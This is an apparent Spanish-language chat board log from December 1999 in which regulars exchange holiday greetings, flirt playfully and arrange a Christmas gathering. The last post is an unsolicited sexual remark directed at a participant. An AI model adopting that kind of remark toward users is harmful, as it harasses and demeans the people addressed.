| Ahora no fue culpa del jefe sino del servidor....
que me ha dejao tiraaaaaaa
Ya toy aquí!!!!!!!!!!! |
| Ref: Dover puesto el 22/12/99 13:13 |
| No viene nadie. Claro esto me pasa por falta de planificacion.
Dejare esta nota en la puerta del rincon. VIERNES DIA 24 "GRAN FIESTA CARNIVORA" A LAS 12:00 horas IMPRESCINDIBLE venir de buen humor y con ganas de marcha. No es necesario etiqueta y la entrada es libre. Celebracion junglera de las fiestas navideñas. Te esperamos no faltes !!!!!!!!!! |
| Ref: Potys puesto el 22/12/99 13:13 |
| Sirenitas!!!!!!!!!!!!
Rhomer!!!!!!!! Estais por ahi???????? |
| Ref: Dover puesto el 22/12/99 13:14 |
| Potys no te vi. Estaba cambiando la fiesta de fecha. Te perece? |
| Ref: Potys puesto el 22/12/99 13:15 |
| Doverrrrrrrrr no te larguesssssss que la página se carga mu' lenta hoy... y no llegooooo |
| Ref: Potys puesto el 22/12/99 13:16 |
| No es necesario etiqueta...
Pero si el parteeeeeeeeeee |
| Ref: Potys puesto el 22/12/99 13:17 |
| Pos claro... Pero pa' mi son las 11 y espero que mi jefe ese día no venga a trabajar que sino... |
| Ref: Dover puesto el 22/12/99 13:17 |
| Como me voy a dejar sola!! Claro que nome largo.
Eso, eso. El parte si que es obligado jejeje. |
| Ref: Dover puesto el 22/12/99 13:20 |
| Hoy estoy especialmente torpe escribiendo.
Oye lo de la hora es modificable, la idea es que vengamos todos. Y si no yo secuestro a tu jefe y asunto arreglado. Que leches!! Mejor te secuestro a ti ;-) |
| Ref: Potys puesto el 22/12/99 13:21 |
| Pero toy sola......
Ah no ya se ha cargao...HOla
Dover........
Pero hay que dar un parte especial
para esa fecha........
Asi que iros de compra...... y a gastar la banda magnética de la tarjeta..para lucir unparte de escándalo...jjejejejejejeej |
| Ref: Potys puesto el 22/12/99 13:22 |
| mmmmmmmmmmm eso del secuestro me ha
gustao, ya ves.......
Y me atarias de manos a la silla.....? Y me taparias los ojos.....? mmmmmmmmmmm |
| Ref: Dover puesto el 22/12/99 13:23 |
| Lo de escandaloso va en sentido carnivoro.
(A ver si alguno vais a venir disfrazados de Rapel o de....¿como se llama el tio este que vi ayer?.
Ah ya!!! Lauren Postigo |
| Ref: Potys puesto el 22/12/99 13:25 |
| Eso, eso..... que no estamos en carnavales.....
Pero no me importaría........ los carnavales son demasiado..... mejor que las navidades a nivel fiestas..... |
| Ref: Dover puesto el 22/12/99 13:29 |
| Tengo que dejarte. Lo siento pero ya sabes que de vez en cuando hay que justificar el sueldo.
Date por secuestrada ;-) Por donde caia tu curro al sur por Los Cristianos, o al norte por La Laguna?. MUACK!!!!!!! |
| Ref: Potys puesto el 22/12/99 13:34 |
| Cómo está el servidor hoy!!!!!!! |
| Ref: Justintime puesto el 22/12/99 13:36 |
| FELICES FIESTAS Y PROSPERO AÑO 2000 |
| Ref: Potys puesto el 22/12/99 13:36 |
| Cariño yo tb. me tengo que ir....
y para situarte mejor......
soy de la otra isla... de Gran Canaria...lo que ocurre es que no nos anuncian como deben... y siempre sale la playa de MAspalomas.... en Tenerife....pero bueno Soy de la capital, capital... de Las Palmas de G.C. |
| Ref: Potys puesto el 22/12/99 13:38 |
| Gracias Justine....... |
| Ref: Potys puesto el 22/12/99 13:40 |
| Gruuuuuuuu gruuuuuuuaaaaaaa
gruuuuuaaaaaaaaa miauuuuuuuu
Es en mi idioma...... Feliz navidad |
| Ref: Potys puesto el 22/12/99 13:42 |
| Bueno ya me voy.....que antes del 24
quiero hacer una visita al banco....
y a mi querido director......
Asi que voy a ver que le puedo sacar hoy...... Como se presenta la navidad.... le saco hasta el pavo de noche buena.... |
| Ref: RHOMER puesto el 22/12/99 16:04 |
| Buenas tardes, hay alguien, o os ha tocado la lotería y os habéis largado a Pernambuco ? Y sin despedirse, cachis la mar ? POOTTTTTTYYYYSSSSSSSSSSSSSSSSSSSSSSS !!!!!! no te habrá tocado, verdad ? Que escándalo, madre mía, que escándalo..... |
| Ref: RHOMER puesto el 22/12/99 16:26 |
| Hey, panda, sabéis de alguna dirección de la que se puedan estirar postales de navidad ? en http://www.nex.com.br/ hay de preciosas, pero llevan fecha del 1999 |
| Ref: RHOMER puesto el 22/12/99 16:31 |
| Nada, que les ha tocao de verdad.... BUAAAAAAAAAAAAA !!!! y que haré yo ahora sin ellos/ellas ? sniffff.... |
| Ref: Potys puesto el 22/12/99 16:38 |
| Que noooooooooooo
Que no me ha tocao.......la lotería......sólo el reintegro...... |
| Ref: RHOMER A POTYS puesto el 22/12/99 16:44 |
| Felicidades...!!!! Uf, que susto, pensaba que ya estaba solo como un naúfrago..... Potys, cariño, como estás ? |
| Ref: RHOMER A POTYS puesto el 22/12/99 16:46 |
| Princesita, dame tu mail, y te envío una cosa muy bonita, te gustará. Lastima que es del año 1999, pero vale la pena. Hazte la cuenta de que es del 2000, vale ? |
| Ref: Potys puesto el 22/12/99 16:50 |
| Rhomer mi e-mail es el siguiente potys@chicaole.com
Apúntalo en tu agenda particular........ |
| Ref: RHOMER A POTYS puesto el 22/12/99 16:56 |
| Cariño, ya lo he anotado, estás en sitio preferente... ya te he enviado el mail, dime si te gusta... vale ? Ahora me he de ir, ya sabes, me voy a las 5. Nos vemos mañana ? un beso.... !! |
| Ref: Potys puesto el 22/12/99 16:58 |
| Venga un besote para ti..... y hasta mañana... acuerdate de la fiesta !!!!!!!!! |
| Ref: Potys puesto el 22/12/99 17:07 |
| Qué pasada!!!!!!!!!!! Gracias Rhomer!!!!!!!!! |
| Ref: BRUTO puesto el 22/12/99 17:19 |
| Como estás Potys? |
| Ref: BRUTO puesto el 22/12/99 17:30 |
| Ya te han ractado? |
| Ref: Mario puesto el 22/12/99 17:33 |
| Hola |
| Ref: Potys puesto el 22/12/99 17:39 |
| uffffffff salvada por los pelos.....
A ver si mi jefe se larga pronto y tengo la tarde pa' mi.... Wenas brutoooooooooo |
| Ref: Mario puesto el 22/12/99 17:45 |
| Hola Potys |
| Ref: Dover puesto el 22/12/99 17:46 |
| Todavia no la he raptado Bruto, pero ya queda menos.
Mira por la ventana Potys, ves a un tio vestido de arabe en un corcel negro?? Pues soy yo !!!!! Menuda pinta eh?? No hagais mucho ruido que el jefe me vigila..... |
| Ref: Potys puesto el 22/12/99 17:47 |
| Buenas mario.... mucho trabajo? |
| Ref: Dover puesto el 22/12/99 17:48 |
| Bueno Nh, Charly, Robinet.
Por que no os passia un ratito por aqui? Justintime ha sido una gran alegria verte. Felices Fiestas par ti tambien amigo!!!!!! |
| Ref: Mario a Potys puesto el 22/12/99 17:49 |
| Estoy con los trabajos previos a la última prueba del año 2000. |
| Ref: BRUTO puesto el 22/12/99 17:49 |
| Potys, y el parte?, nos vas a privar de una de las pocas alegrías del día? |
| Ref: Dover puesto el 22/12/99 17:50 |
| Hola Mario, perdona mi descortesia no te vi.
Bienvenido !!!!!! |
| Ref: Mario puesto el 22/12/99 17:54 |
| No te preocupes Dover. Yo también estoy un poco ausente. |
| Ref: Dover puesto el 22/12/99 17:56 |
| No puedo quedarme. Lo siento.
Creo que hasta mañana ya no os veo. Cuidaos todos!!!! Y un saludete para los nuevos!!!! |
| Ref: Potys puesto el 22/12/99 17:58 |
| Dover cariño estoy
a ratos por aquí.... cuando el jefe se da la vuelta.....
Tírales la cuerda a ver si entran...... Mario este nuevo cambio nos trae a todos de cabeza.... |
| Ref: Potys puesto el 22/12/99 18:01 |
| Pues me quedo yo con la cuerda....
Y por lo que veo aquí fuera.. yo tb. me voy....
Besotesssssssss
A ver si me paso después por aquí.... |
| Ref: BRUTO puesto el 22/12/99 18:02 |
| Para entrar por tu ventana (solo por verte) no necesito cuerda, subiría por la pared. |
| Ref: Mario puesto el 22/12/99 18:13 |
| Sigue alguien por ahí? |
| Ref: nh puesto el 22/12/99 18:17 |
| hola Bruto, parece que se han pirao todos, mala suerte, pos me iré ar rincón |
| Ref: Dulcinea a Dover puesto el 22/12/99 18:26 |
| Estas por ahi? Acabo de recibir tu emilio. |
| Ref: nh puesto el 22/12/99 18:33 |
| hola simpar, cuanto tiempo sin leerte
el amigo Dover se fue, nosotros andamos por el chat gelido, si quieres dar esos besos en directo... |
| Ref: nh puesto el 22/12/99 18:43 |
| bueno, en vista de la concurrencia, me voy a ver el correo
un día que entrá uno y esta esto vacio, snifff |
| Ref: nuevomiembro puesto el 22/12/99 18:55 |
| Sonríe, nh, que no estás solo. Siempre hay alguien mirando, probablemente en peor estado, y con menos esperanzas (eh, no me mires a mí, que estoy en mimejor momento. Se trata de un amigo mío |
| Ref: Dulcinea a nh puesto el 22/12/99 19:15 |
| Que haría yo sin ti...siempre ando buscando a Dover y siempre eres tú quien tiene que dar la cara.De todas formas acabo de estar en el chat y no os veo, ¿ o será que ya no os reconozco? claro, tanto tiempo sin veros!. En fin, os deseo una Feliz y carnívora Navidad!. |
| Ref: BRUTO puesto el 22/12/99 19:25 |
| DULCINEA.- hola,¿como estás? |
| Ref: nuevomiembro a Dulcinea puesto el 22/12/99 19:28 |
| No es de buena educación hacer el vacío a los nuevos desconocidos. Hazme un sitio, que traigo vino de Málaga y almendritas. Nos damos calor hasta que aparezca alguien más, ¿vale? |
| Ref: Robinet a Potys puesto el 22/12/99 19:41 |
| Mira el correo ;-) |
| Ref: Potys puesto el 22/12/99 19:43 |
| Holaaaaaaa he vuelto.....
Me tenía que ir..pero ya no... hay alguien? |
| Ref: Potys puesto el 22/12/99 19:44 |
| nada de nada |
| Ref: Potys puesto el 22/12/99 19:44 |
| nada de nada |
| Ref: Potys puesto el 22/12/99 19:46 |
| Cariño no hay nada.... está más vacio que mi estómago.... voy a por un cortado y vuelvo a mirar apetece? |
| Ref: BRUTO puesto el 22/12/99 19:53 |
| Hola Potys, ya estoy subiendo por tu ventana |
| Ref: Potys puesto el 22/12/99 19:55 |
| que la oficina está mu' alta cariño...... ten cuidado |
| Ref: nuevomiembro puesto el 22/12/99 19:55 |
| Encantado estaría de conocerte, Potys. ¿te hablas con desconocidos? |
| Ref: Potys puesto el 22/12/99 19:57 |
| me encantan los desconocidos..... pero hoy no tengo mucho tiempo.... un par de minutos nada más... Salgo del trabajo a las 8 |
| Ref: nuevomiembro puesto el 22/12/99 20:02 |
| Mañana entonces. Creo que me ha dado chispa al rozarte, ¿no? |
| Ref: nh a dulcinea puesto el 22/12/99 20:48 |
| yo estuve pasando frío, pero como no os dignasteís acompañarme, pos me fui
Doveeeeerrr, que ha estao buscandote la sin par, y como solo quiere estar contigo... qué les dais a las mujeres?, jo, lo mio es el rincon, esta visto y comprobado |
| Ref: pol puesto el 22/12/99 22:34 |
| me gustaria acariciar tus pechos |